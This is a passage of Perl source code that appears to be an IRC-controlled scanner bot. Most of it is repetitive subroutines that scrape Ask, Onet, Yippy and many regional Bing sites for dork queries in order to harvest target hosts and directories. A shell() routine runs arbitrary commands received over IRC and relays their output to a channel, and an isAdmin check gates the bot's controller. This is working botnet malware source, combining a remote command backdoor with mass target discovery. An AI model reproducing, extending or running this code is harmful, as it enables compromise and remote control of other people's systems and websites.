  9531.     for (my $i=1; $i<=100; $i+=1) {
  9532.  
  9533.         my $search = ("http://br.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1");
  9534.  
  9535.         my $res = &search_engine_query($search);
  9536.  
  9537.         while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
  9538.  
  9539.             my $link = $1;
  9540.  
  9541.             if ($link !~ /askBR\.com/){
  9542.  
  9543.                 my @grep = &links($link);
  9544.  
  9545.                 push(@list,@grep);
  9546.  
  9547.             }
  9548.  
  9549.         }
  9550.  
  9551.     }
  9552.  
  9553.     return @list;
  9554.  
  9555. }
  9556.  
  9557.  
  9558.  
  9559. sub askMX() {
  9560.  
  9561.     my @list;
  9562.  
  9563.     my $key = $_[0];
  9564.  
  9565.     for (my $i=1; $i<=100; $i+=1) {
  9566.  
  9567.         my $search = ("http://mx.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1");
  9568.  
  9569.         my $res = &search_engine_query($search);
  9570.  
  9571.         while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
  9572.  
  9573.             my $link = $1;
  9574.  
  9575.             if ($link !~ /askMX\.com/){
  9576.  
  9577.                 my @grep = &links($link);
  9578.  
  9579.                 push(@list,@grep);
  9580.  
  9581.             }
  9582.  
  9583.         }
  9584.  
  9585.     }
  9586.  
  9587.     return @list;
  9588.  
  9589. }
  9590.  
  9591. sleep(4);
  9592.  
  9593. sub askJP() {
  9594.  
  9595.     my @list;
  9596.  
  9597.     my $key = $_[0];
  9598.  
  9599.     for (my $i=1; $i<=100; $i+=1) {
  9600.  
  9601.         my $search = ("http://jp.ask.com/web?q=".uri_escape($key)."&qsrc=0&frstpgo=0&o=0&l=dir&qid=BC8234276535BC11853E5F40B17E3B01&page=".$i."&jss=1");
  9602.  
  9603.         my $res = &search_engine_query($search);
  9604.  
  9605.         while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
  9606.  
  9607.             my $link = $1;
  9608.  
  9609.             if ($link !~ /askJP\.com/){
  9610.  
  9611.                 my @grep = &links($link);
  9612.  
  9613.                 push(@list,@grep);
  9614.  
  9615.             }
  9616.  
  9617.         }
  9618.  
  9619.     }
  9620.  
  9621.     return @list;
  9622.  
  9623. }
  9624.  
  9625.  
  9626.  
  9627. sub onet() {
  9628.  
  9629.         my @list;
  9630.  
  9631.         my $key = $_[0];
  9632.  
  9633.         my $b   = 0;
  9634.  
  9635.         for ($b=1; $b<=400; $b+=10) {
  9636.  
  9637.                 my $search = ("http://szukaj.onet.pl/".$b.",query.html?qt=".uri_escape($key));
  9638.  
  9639.                 my $res = &search_engine_query($search);
  9640.  
  9641.                 while ($res =~ m/<a href=\"http:\/\/(.*?)\">/g) {
  9642.  
  9643.                         my $link = $1;
  9644.  
  9645.                         if ($link !~ /onet|webcache|query/){
  9646.  
  9647.                                 my @grep = &links($link);
  9648.  
  9649.                 push(@list,@grep);
  9650.  
  9651.                         }
  9652.  
  9653.                 }
  9654.  
  9655.         }
  9656.  
  9657.         return @list;
  9658.  
  9659. }
  9660.  
  9661.  
  9662.  
  9663. sub clusty() {
  9664.  
  9665.     my @list;
  9666.  
  9667.         my $key = $_[0];
  9668.  
  9669.     my $b   = 0;
  9670.  
  9671.         for ($b=10; $b<=200; $b+=10) {
  9672.  
  9673.         my $search = ("http://search.yippy.com/search?input-form=clusty-simple&v%3Asources=webplus-ns-aaf&v%3Aproject=clusty&query=".uri_escape($key)."&v:state=root|root-".$b."-20|0&");
  9674.  
  9675.         my $res = &search_engine_query($search);
  9676.  
  9677.                 if ($res !~ /next/) {$b=100;}
  9678.  
  9679.         while ($res =~ m/<a href=\"http:\/\/(.*?)\"/g) {
  9680.  
  9681.             my $link = $1;
  9682.  
  9683.             if ($1 !~ /yippy\.com/){
  9684.  
  9685.                 my @grep = &links($link);
  9686.  
  9687.                 push(@list,@grep);
  9688.  
  9689.             }
  9690.  
  9691.         }
  9692.  
  9693.     }
  9694.  
  9695.     return @list;
  9696.  
  9697. }
  9698.  
  9699.  
  9700.  
  9701. sub bing() {
  9702.  
  9703.     my @list;
  9704.  
  9705.     my $key = $_[0];
  9706.  
  9707.     for (my $i=1; $i<=400; $i+=10) {
  9708.  
  9709.         my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&first=".$i);
  9710.  
  9711.         my $res = &search_engine_query($search);
  9712.  
  9713.         while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  9714.  
  9715.                         my $link = $1;
  9716.  
  9717.             if ($link !~ /google/) {
  9718.  
  9719.                 my @grep = &links($link);
  9720.  
  9721.                 push(@list,@grep);
  9722.  
  9723.             }
  9724.  
  9725.         }
  9726.  
  9727.     }
  9728.  
  9729.     return @list;
  9730.  
  9731. }
  9732.  
  9733.  
  9734.  
  9735. sub bingDE() {
  9736.  
  9737.     my @list;
  9738.  
  9739.     my $key = $_[0];
  9740.  
  9741.     for (my $i=1; $i<=1000; $i+=10) {
  9742.  
  9743.         my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=de&rf=1&first=".$i."&FORM=PORE");
  9744.  
  9745.         my $res = &search_engine_query($search);
  9746.  
  9747.         while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  9748.  
  9749.             my $link = $1;
  9750.  
  9751.             if ($link !~ /msn|live|bingDE/) {
  9752.  
  9753.                 my @grep = &links($link);
  9754.  
  9755.                 push(@list,@grep);
  9756.  
  9757.             }
  9758.  
  9759.         }
  9760.  
  9761.     }
  9762.  
  9763.     return @list;
  9764.  
  9765. }
  9766.  
  9767. sleep(4);
  9768.  
  9769. sub bingUK() {
  9770.  
  9771.     my @list;
  9772.  
  9773.     my $key = $_[0];
  9774.  
  9775.     for (my $i=1; $i<=1000; $i+=10) {
  9776.  
  9777.         my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=uk&rf=1&first=".$i."&FORM=PORE");
  9778.  
  9779.         my $res = &search_engine_query($search);
  9780.  
  9781.         while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  9782.  
  9783.             my $link = $1;
  9784.  
  9785.             if ($link !~ /msn|live|bingUK/) {
  9786.  
  9787.                 my @grep = &links($link);
  9788.  
  9789.                 push(@list,@grep);
  9790.  
  9791.             }
  9792.  
  9793.         }
  9794.  
  9795.     }
  9796.  
  9797.     return @list;
  9798.  
  9799. }
  9800.  
  9801.  
  9802.  
  9803. sub bingCA() {
  9804.  
  9805.     my @list;
  9806.  
  9807.     my $key = $_[0];
  9808.  
  9809.     for (my $i=1; $i<=1000; $i+=10) {
  9810.  
  9811.         my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=ca&rf=1&first=".$i."&FORM=PORE");
  9812.  
  9813.         my $res = &search_engine_query($search);
  9814.  
  9815.         while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  9816.  
  9817.             my $link = $1;
  9818.  
  9819.             if ($link !~ /msn|live|bingCA/) {
  9820.  
  9821.                 my @grep = &links($link);
  9822.  
  9823.                 push(@list,@grep);
  9824.  
  9825.             }
  9826.  
  9827.         }
  9828.  
  9829.     }
  9830.  
  9831.     return @list;
  9832.  
  9833. }
  9834.  
  9835.  
  9836.  
  9837. sub bingBR() {
  9838.  
  9839.     my @list;
  9840.  
  9841.     my $key = $_[0];
  9842.  
  9843.     for (my $i=1; $i<=1000; $i+=10) {
  9844.  
  9845.         my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=br&rf=1&first=".$i."&FORM=PORE");
  9846.  
  9847.         my $res = &search_engine_query($search);
  9848.  
  9849.         while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  9850.  
  9851.             my $link = $1;
  9852.  
  9853.             if ($link !~ /msn|live|bingBR/) {
  9854.  
  9855.                 my @grep = &links($link);
  9856.  
  9857.                 push(@list,@grep);
  9858.  
  9859.             }
  9860.  
  9861.         }
  9862.  
  9863.     }
  9864.  
  9865.     return @list;
  9866.  
  9867. }
  9868.  
  9869.  
  9870.  
  9871. sub bingFR() {
  9872.  
  9873.     my @list;
  9874.  
  9875.     my $key = $_[0];
  9876.  
  9877.     for (my $i=1; $i<=1000; $i+=10) {
  9878.  
  9879.         my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=fr&rf=1&first=".$i."&FORM=PORE");
  9880.  
  9881.         my $res = &search_engine_query($search);
  9882.  
  9883.         while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  9884.  
  9885.             my $link = $1;
  9886.  
  9887.             if ($link !~ /msn|live|bingFR/) {
  9888.  
  9889.                 my @grep = &links($link);
  9890.  
  9891.                 push(@list,@grep);
  9892.  
  9893.             }
  9894.  
  9895.         }
  9896.  
  9897.     }
  9898.  
  9899.     return @list;
  9900.  
  9901. }
  9902.  
  9903.  
  9904.  
  9905. sub bingES() {
  9906.  
  9907.     my @list;
  9908.  
  9909.     my $key = $_[0];
  9910.  
  9911.     for (my $i=1; $i<=1000; $i+=10) {
  9912.  
  9913.         my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=es&rf=1&first=".$i."&FORM=PORE");
  9914.  
  9915.         my $res = &search_engine_query($search);
  9916.  
  9917.         while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  9918.  
  9919.             my $link = $1;
  9920.  
  9921.             if ($link !~ /msn|live|bingES/) {
  9922.  
  9923.                 my @grep = &links($link);
  9924.  
  9925.                 push(@list,@grep);
  9926.  
  9927.             }
  9928.  
  9929.         }
  9930.  
  9931.     }
  9932.  
  9933.     return @list;
  9934.  
  9935. }
  9936.  
  9937.  
  9938.  
  9939. sub bingIT() {
  9940.  
  9941.     my @list;
  9942.  
  9943.     my $key = $_[0];
  9944.  
  9945.     for (my $i=1; $i<=1000; $i+=10) {
  9946.  
  9947.         my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=it&rf=1&first=".$i."&FORM=PORE");
  9948.  
  9949.         my $res = &search_engine_query($search);
  9950.  
  9951.         while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  9952.  
  9953.             my $link = $1;
  9954.  
  9955.             if ($link !~ /msn|live|bingIT/) {
  9956.  
  9957.                 my @grep = &links($link);
  9958.  
  9959.                 push(@list,@grep);
  9960.  
  9961.             }
  9962.  
  9963.         }
  9964.  
  9965.     }
  9966.  
  9967.     return @list;
  9968.  
  9969. }
  9970.  
  9971. sleep(4);
  9972.  
  9973. sub bingBE() {
  9974.  
  9975.     my @list;
  9976.  
  9977.     my $key = $_[0];
  9978.  
  9979.     for (my $i=1; $i<=1000; $i+=10) {
  9980.  
  9981.         my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=be&rf=1&first=".$i."&FORM=PORE");
  9982.  
  9983.         my $res = &search_engine_query($search);
  9984.  
  9985.         while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  9986.  
  9987.             my $link = $1;
  9988.  
  9989.             if ($link !~ /msn|live|bingBE/) {
  9990.  
  9991.                 my @grep = &links($link);
  9992.  
  9993.                 push(@list,@grep);
  9994.  
  9995.             }
  9996.  
  9997.         }
  9998.  
  9999.     }
  10000.  
  10001.     return @list;
  10002.  
  10003. }
  10004.  
  10005.  
  10006.  
  10007. sub bingNL() {
  10008.  
  10009.     my @list;
  10010.  
  10011.     my $key = $_[0];
  10012.  
  10013.     for (my $i=1; $i<=1000; $i+=10) {
  10014.  
  10015.         my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=nl&rf=1&first=".$i."&FORM=PORE");
  10016.  
  10017.         my $res = &search_engine_query($search);
  10018.  
  10019.         while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  10020.  
  10021.             my $link = $1;
  10022.  
  10023.             if ($link !~ /msn|live|bingNL/) {
  10024.  
  10025.                 my @grep = &links($link);
  10026.  
  10027.                 push(@list,@grep);
  10028.  
  10029.             }
  10030.  
  10031.         }
  10032.  
  10033.     }
  10034.  
  10035.     return @list;
  10036.  
  10037. }
  10038.  
  10039.  
  10040.  
  10041. sub bingPT() {
  10042.  
  10043.     my @list;
  10044.  
  10045.     my $key = $_[0];
  10046.  
  10047.     for (my $i=1; $i<=1000; $i+=10) {
  10048.  
  10049.         my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=pt&rf=1&first=".$i."&FORM=PORE");
  10050.  
  10051.         my $res = &search_engine_query($search);
  10052.  
  10053.         while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  10054.  
  10055.             my $link = $1;
  10056.  
  10057.             if ($link !~ /msn|live|bingPT/) {
  10058.  
  10059.                 my @grep = &links($link);
  10060.  
  10061.                 push(@list,@grep);
  10062.  
  10063.             }
  10064.  
  10065.         }
  10066.  
  10067.     }
  10068.  
  10069.     return @list;
  10070.  
  10071. }
  10072.  
  10073.  
  10074.  
  10075. sub bingNO() {
  10076.  
  10077.     my @list;
  10078.  
  10079.     my $key = $_[0];
  10080.  
  10081.     for (my $i=1; $i<=1000; $i+=10) {
  10082.  
  10083.         my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=no&rf=1&first=".$i."&FORM=PORE");
  10084.  
  10085.         my $res = &search_engine_query($search);
  10086.  
  10087.         while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  10088.  
  10089.             my $link = $1;
  10090.  
  10091.             if ($link !~ /msn|live|bingNO/) {
  10092.  
  10093.                 my @grep = &links($link);
  10094.  
  10095.                 push(@list,@grep);
  10096.  
  10097.             }
  10098.  
  10099.         }
  10100.  
  10101.     }
  10102.  
  10103.     return @list;
  10104.  
  10105. }
  10106.  
  10107.  
  10108.  
  10109. sub bingDK() {
  10110.  
  10111.     my @list;
  10112.  
  10113.     my $key = $_[0];
  10114.  
  10115.     for (my $i=1; $i<=1000; $i+=10) {
  10116.  
  10117.         my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=dk&rf=1&first=".$i."&FORM=PORE");
  10118.  
  10119.         my $res = &search_engine_query($search);
  10120.  
  10121.         while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  10122.  
  10123.             my $link = $1;
  10124.  
  10125.             if ($link !~ /msn|live|bingDK/) {
  10126.  
  10127.                 my @grep = &links($link);
  10128.  
  10129.                 push(@list,@grep);
  10130.  
  10131.             }
  10132.  
  10133.         }
  10134.  
  10135.     }
  10136.  
  10137.     return @list;
  10138.  
  10139. }
  10140.  
  10141.  
  10142.  
  10143. sub bingSE() {
  10144.  
  10145.     my @list;
  10146.  
  10147.     my $key = $_[0];
  10148.  
  10149.     for (my $i=1; $i<=1000; $i+=10) {
  10150.  
  10151.         my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=se&rf=1&first=".$i."&FORM=PORE");
  10152.  
  10153.         my $res = &search_engine_query($search);
  10154.  
  10155.         while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  10156.  
  10157.             my $link = $1;
  10158.  
  10159.             if ($link !~ /msn|live|bingSE/) {
  10160.  
  10161.                 my @grep = &links($link);
  10162.  
  10163.                 push(@list,@grep);
  10164.  
  10165.             }
  10166.  
  10167.         }
  10168.  
  10169.     }
  10170.  
  10171.     return @list;
  10172.  
  10173. }
  10174.  
  10175. sleep(4);
  10176.  
  10177. sub bingCH() {
  10178.  
  10179.     my @list;
  10180.  
  10181.     my $key = $_[0];
  10182.  
  10183.     for (my $i=1; $i<=1000; $i+=10) {
  10184.  
  10185.         my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=ch&rf=1&first=".$i."&FORM=PORE");
  10186.  
  10187.         my $res = &search_engine_query($search);
  10188.  
  10189.         while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  10190.  
  10191.             my $link = $1;
  10192.  
  10193.             if ($link !~ /msn|live|bingCH/) {
  10194.  
  10195.                 my @grep = &links($link);
  10196.  
  10197.                 push(@list,@grep);
  10198.  
  10199.             }
  10200.  
  10201.         }
  10202.  
  10203.     }
  10204.  
  10205.     return @list;
  10206.  
  10207. }
  10208.  
  10209.  
  10210.  
  10211. sub bingNZ() {
  10212.  
  10213.     my @list;
  10214.  
  10215.     my $key = $_[0];
  10216.  
  10217.     for (my $i=1; $i<=1000; $i+=10) {
  10218.  
  10219.         my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=nz&rf=1&first=".$i."&FORM=PORE");
  10220.  
  10221.         my $res = &search_engine_query($search);
  10222.  
  10223.         while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  10224.  
  10225.             my $link = $1;
  10226.  
  10227.             if ($link !~ /msn|live|bingNZ/) {
  10228.  
  10229.                 my @grep = &links($link);
  10230.  
  10231.                 push(@list,@grep);
  10232.  
  10233.             }
  10234.  
  10235.         }
  10236.  
  10237.     }
  10238.  
  10239.     return @list;
  10240.  
  10241. }
  10242.  
  10243.  
  10244.  
  10245. sub bingRU() {
  10246.  
  10247.     my @list;
  10248.  
  10249.     my $key = $_[0];
  10250.  
  10251.     for (my $i=1; $i<=1000; $i+=10) {
  10252.  
  10253.         my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=ru&rf=1&first=".$i."&FORM=PORE");
  10254.  
  10255.         my $res = &search_engine_query($search);
  10256.  
  10257.         while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  10258.  
  10259.             my $link = $1;
  10260.  
  10261.             if ($link !~ /msn|live|bingRU/) {
  10262.  
  10263.                 my @grep = &links($link);
  10264.  
  10265.                 push(@list,@grep);
  10266.  
  10267.             }
  10268.  
  10269.         }
  10270.  
  10271.     }
  10272.  
  10273.     return @list;
  10274.  
  10275. }
  10276.  
  10277.  
  10278.  
  10279. sub bingJP() {
  10280.  
  10281.     my @list;
  10282.  
  10283.     my $key = $_[0];
  10284.  
  10285.     for (my $i=1; $i<=1000; $i+=10) {
  10286.  
  10287.         my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=jp&rf=1&first=".$i."&FORM=PORE");
  10288.  
  10289.         my $res = &search_engine_query($search);
  10290.  
  10291.         while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  10292.  
  10293.             my $link = $1;
  10294.  
  10295.             if ($link !~ /msn|live|bingJP/) {
  10296.  
  10297.                 my @grep = &links($link);
  10298.  
  10299.                 push(@list,@grep);
  10300.  
  10301.             }
  10302.  
  10303.         }
  10304.  
  10305.     }
  10306.  
  10307.     return @list;
  10308.  
  10309. }
  10310.  
  10311.  
  10312.  
  10313. sub bingCN() {
  10314.  
  10315.     my @list;
  10316.  
  10317.     my $key = $_[0];
  10318.  
  10319.     for (my $i=1; $i<=1000; $i+=10) {
  10320.  
  10321.         my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=cn&rf=1&first=".$i."&FORM=PORE");
  10322.  
  10323.         my $res = &search_engine_query($search);
  10324.  
  10325.         while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  10326.  
  10327.             my $link = $1;
  10328.  
  10329.             if ($link !~ /msn|live|bingCN/) {
  10330.  
  10331.                 my @grep = &links($link);
  10332.  
  10333.                 push(@list,@grep);
  10334.  
  10335.             }
  10336.  
  10337.         }
  10338.  
  10339.     }
  10340.  
  10341.     return @list;
  10342.  
  10343. }
  10344.  
  10345.  
  10346.  
  10347. sub bingKR() {
  10348.  
  10349.     my @list;
  10350.  
  10351.     my $key = $_[0];
  10352.  
  10353.     for (my $i=1; $i<=1000; $i+=10) {
  10354.  
  10355.         my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=kr&rf=1&first=".$i."&FORM=PORE");
  10356.  
  10357.         my $res = &search_engine_query($search);
  10358.  
  10359.         while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  10360.  
  10361.             my $link = $1;
  10362.  
  10363.             if ($link !~ /msn|live|bingKR/) {
  10364.  
  10365.                 my @grep = &links($link);
  10366.  
  10367.                 push(@list,@grep);
  10368.  
  10369.             }
  10370.  
  10371.         }
  10372.  
  10373.     }
  10374.  
  10375.     return @list;
  10376.  
  10377. }
  10378.  
  10379. sleep(4);
  10380.  
  10381. sub bingMX() {
  10382.  
  10383.     my @list;
  10384.  
  10385.     my $key = $_[0];
  10386.  
  10387.     for (my $i=1; $i<=1000; $i+=10) {
  10388.  
  10389.         my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=mx&rf=1&first=".$i."&FORM=PORE");
  10390.  
  10391.         my $res = &search_engine_query($search);
  10392.  
  10393.         while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  10394.  
  10395.             my $link = $1;
  10396.  
  10397.             if ($link !~ /msn|live|bingMX/) {
  10398.  
  10399.                 my @grep = &links($link);
  10400.  
  10401.                 push(@list,@grep);
  10402.  
  10403.             }
  10404.  
  10405.         }
  10406.  
  10407.     }
  10408.  
  10409.     return @list;
  10410.  
  10411. }
  10412.  
  10413.  
  10414.  
  10415. sub bingAR() {
  10416.  
  10417.     my @list;
  10418.  
  10419.     my $key = $_[0];
  10420.  
  10421.     for (my $i=1; $i<=1000; $i+=10) {
  10422.  
  10423.         my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=ar&rf=1&first=".$i."&FORM=PORE");
  10424.  
  10425.         my $res = &search_engine_query($search);
  10426.  
  10427.         while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  10428.  
  10429.             my $link = $1;
  10430.  
  10431.             if ($link !~ /msn|live|bingAR/) {
  10432.  
  10433.                 my @grep = &links($link);
  10434.  
  10435.                 push(@list,@grep);
  10436.  
  10437.             }
  10438.  
  10439.         }
  10440.  
  10441.     }
  10442.  
  10443.     return @list;
  10444.  
  10445. }
  10446.  
  10447.  
  10448.  
  10449. sub bingCL() {
  10450.  
  10451.     my @list;
  10452.  
  10453.     my $key = $_[0];
  10454.  
  10455.     for (my $i=1; $i<=1000; $i+=10) {
  10456.  
  10457.         my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=cl&rf=1&first=".$i."&FORM=PORE");
  10458.  
  10459.         my $res = &search_engine_query($search);
  10460.  
  10461.         while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  10462.  
  10463.             my $link = $1;
  10464.  
  10465.             if ($link !~ /msn|live|bingCL/) {
  10466.  
  10467.                 my @grep = &links($link);
  10468.  
  10469.                 push(@list,@grep);
  10470.  
  10471.             }
  10472.  
  10473.         }
  10474.  
  10475.     }
  10476.  
  10477.     return @list;
  10478.  
  10479. }
  10480.  
  10481.  
  10482.  
  10483. sub bingAU() {
  10484.  
  10485.     my @list;
  10486.  
  10487.     my $key = $_[0];
  10488.  
  10489.     for (my $i=1; $i<=1000; $i+=10) {
  10490.  
  10491.         my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&cc=au&rf=1&first=".$i."&FORM=PORE");
  10492.  
  10493.         my $res = &search_engine_query($search);
  10494.  
  10495.         while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  10496.  
  10497.             my $link = $1;
  10498.  
  10499.             if ($link !~ /msn|live|bingAU/) {
  10500.  
  10501.                 my @grep = &links($link);
  10502.  
  10503.                 push(@list,@grep);
  10504.  
  10505.             }
  10506.  
  10507.         }
  10508.  
  10509.     }
  10510.  
  10511.     return @list;
  10512.  
  10513. }
  10514.  
  10515. #########################################
  10516.  
  10517.  
  10518.  
  10519. sub clean() {
  10520.  
  10521.     my @cln = ();
  10522.  
  10523.     my %visit = ();
  10524.  
  10525.     foreach my $element (@_) {
  10526.  
  10527.         $element =~ s/\/+/\//g;
  10528.  
  10529.         next if $visit{$element}++;
  10530.  
  10531.         push @cln, $element;
  10532.  
  10533.     }
  10534.  
  10535.     return @cln;
  10536.  
  10537. }
  10538.  
  10539.  
  10540.  
  10541. sub key() {
  10542.  
  10543.     my $dork = $_[0];
  10544.  
  10545.     $dork =~ s/ /\+/g;
  10546.  
  10547.     $dork =~ s/:/\%3A/g;
  10548.  
  10549.     $dork =~ s/\//\%2F/g;
  10550.  
  10551.     $dork =~ s/\?/\%3F/g;
  10552.  
  10553.     $dork =~ s/&/\%26/g;
  10554.  
  10555.     $dork =~ s/\"/\%22/g;
  10556.  
  10557.     $dork =~ s/,/\%2C/g;
  10558.  
  10559.     $dork =~ s/\\/\%5C/g;
  10560.  
  10561.         $dork =~ s/@/\%40/g;
  10562.  
  10563.         $dork =~ s/\[/\%5B/g;
  10564.  
  10565.         $dork =~ s/\]/\%5D/g;
  10566.  
  10567.         $dork =~ s/\?/\%3F/g;
  10568.  
  10569.         $dork =~ s/\=/\%3D/g;
  10570.  
  10571.         $dork =~ s/\|/\%7C/g;
  10572.  
  10573.     return $dork;
  10574.  
  10575. }
  10576.  
  10577.  
  10578.  
  10579. sub links() {
  10580.  
  10581.     my @list;
  10582.  
  10583.     my $link = $_[0];
  10584.  
  10585.     my $host = $_[0];
  10586.  
  10587.     my $hdir = $_[0];
  10588.  
  10589.     $hdir =~ s/(.*)\/[^\/]*$/\1/;
  10590.  
  10591.     $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
  10592.  
  10593.     $host .= "/";
  10594.  
  10595.     $link .= "/";
  10596.  
  10597.     $hdir .= "/";
  10598.  
  10599.     $host =~ s/\/\//\//g;
  10600.  
  10601.     $hdir =~ s/\/\//\//g;
  10602.  
  10603.     $link =~ s/\/\//\//g;
  10604.  
  10605.     push(@list,$link,$host,$hdir);
  10606.  
  10607.     return @list;
  10608.  
  10609. }
  10610.  
  10611.  
  10612.  
  10613.  
  10614.  
  10615. sub search_engine_query() {
  10616.  
  10617.     my $url = $_[0];
  10618.  
  10619.     $url =~ s/http:\/\///;
  10620.  
  10621.     my $host = $url;
  10622.  
  10623.     my $query = $url;
  10624.  
  10625.     my $page  = "";
  10626.  
  10627.     $host =~ s/href=\"?http:\/\///;
  10628.  
  10629.     $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
  10630.  
  10631.     $query =~ s/$host//;
  10632.  
  10633.     if ($query eq "") { $query = "/"; }
  10634.  
  10635.         eval {
  10636.  
  10637.             my $sock = IO::Socket::INET->new(PeerAddr=>"$host", PeerPort=>"80", Proto=>"tcp") or return;
  10638.  
  10639.             my $sget = "GET $query HTTP/1.0\r\n";
  10640.  
  10641.                $sget .= "Host: $host\r\n";
  10642.  
  10643.                $sget .= "Accept: */*\r\n";
  10644.  
  10645.                $sget .= "User-Agent: $uagent\r\n";
  10646.  
  10647.                $sget .= "Connetion: Close\r\n\r\n";
  10648.  
  10649.             print $sock $sget;
  10650.  
  10651.            # print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: $uagent\r\n\r\n";
  10652.  
  10653.             my @pages = <$sock>;
  10654.  
  10655.             $page = "@pages";
  10656.  
  10657.             close($sock);
  10658.  
  10659.         };
  10660.  
  10661.     return $page;
  10662.  
  10663. }
  10664.  
  10665.  
  10666.  
  10667. sub engineQuery() {
  10668.  
  10669.     my $url = $_[0];
  10670.  
  10671.     $url =~ s/http:\/\///;
  10672.  
  10673.     my $host = $url;
  10674.  
  10675.     my $query = $url;
  10676.  
  10677.     my $page  = "";
  10678.  
  10679.     $host =~ s/href=\"?http:\/\///;
  10680.  
  10681.     $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
  10682.  
  10683.     $query =~ s/$host//;
  10684.  
  10685.     if ($query eq "") { $query = "/"; }
  10686.  
  10687.         eval {
  10688.  
  10689.             my $sock = IO::Socket::INET->new(PeerAddr=>"$host", PeerPort=>"80", Proto=>"tcp") or return;
  10690.  
  10691.             my $sget = "GET $query HTTP/1.0\r\n";
  10692.  
  10693.             $sget .= "Host: $host\r\n";
  10694.  
  10695.             $sget .= "Accept: */*\r\n";
  10696.  
  10697.             $sget .= "User-Agent: $uagent\r\n";
  10698.  
  10699.             $sget .= "Connetion: Close\r\n\r\n";
  10700.  
  10701.             print $sock $sget;
  10702.  
  10703.             my @pages = <$sock>;
  10704.  
  10705.             $page = "@pages";
  10706.  
  10707.             close($sock);
  10708.  
  10709.         };
  10710.  
  10711.     return $page;
  10712.  
  10713. }
  10714.  
  10715. #########################################
  10716.  
  10717.  
  10718.  
  10719. sub shell() {
  10720.  
  10721.     my $chan = $_[0];
  10722.  
  10723.     my $cmd = $_[1];
  10724.  
  10725.     if ($cmd =~ /cd (.*)/) {
  10726.  
  10727.         chdir("$1") || &msg("$chan","No such file or directory");
  10728.  
  10729.         return;
  10730.  
  10731.     }
  10732.  
  10733.     elsif ($pid = fork) { waitpid($pid, 0); }
  10734.  
  10735.     else { if (fork) { exit; } else {
  10736.  
  10737.         my @output = `$cmd 2>&1 3>&1`;
  10738.  
  10739.         my $c = 0;
  10740.  
  10741.         foreach my $output (@output) {
  10742.  
  10743.             $c++;
  10744.  
  10745.             chop $output;
  10746.  
  10747.             &msg("$chan","$output");
  10748.  
  10749.             if ($c == 5) { $c = 0; sleep 3; }
  10750.  
  10751.         }
  10752.  
  10753.         exit;
  10754.  
  10755.     }}
  10756.  
  10757. }
  10758.  
  10759.  
  10760.  
  10761. sub isAdmin() {
  10762.  
  10763.     my $status = 0;
  10764.  
  10765.     my $nick = $_[0];
  10766.  
  10767.     if ($nick eq $admin) { $status = 1; }
  10768.  
  10769.     return $status;
  10770.  
  10771. }
  10772.  
  10773.  
  10774.  
  10775. sub read_dorks() {
  10776.  
  10777.         my $dork = uri_escape($_[0]);
  10778.  
  10779.         my $file = "dorks.txt";
  10780.  
  10781.         my $success = 0;
  10782.  
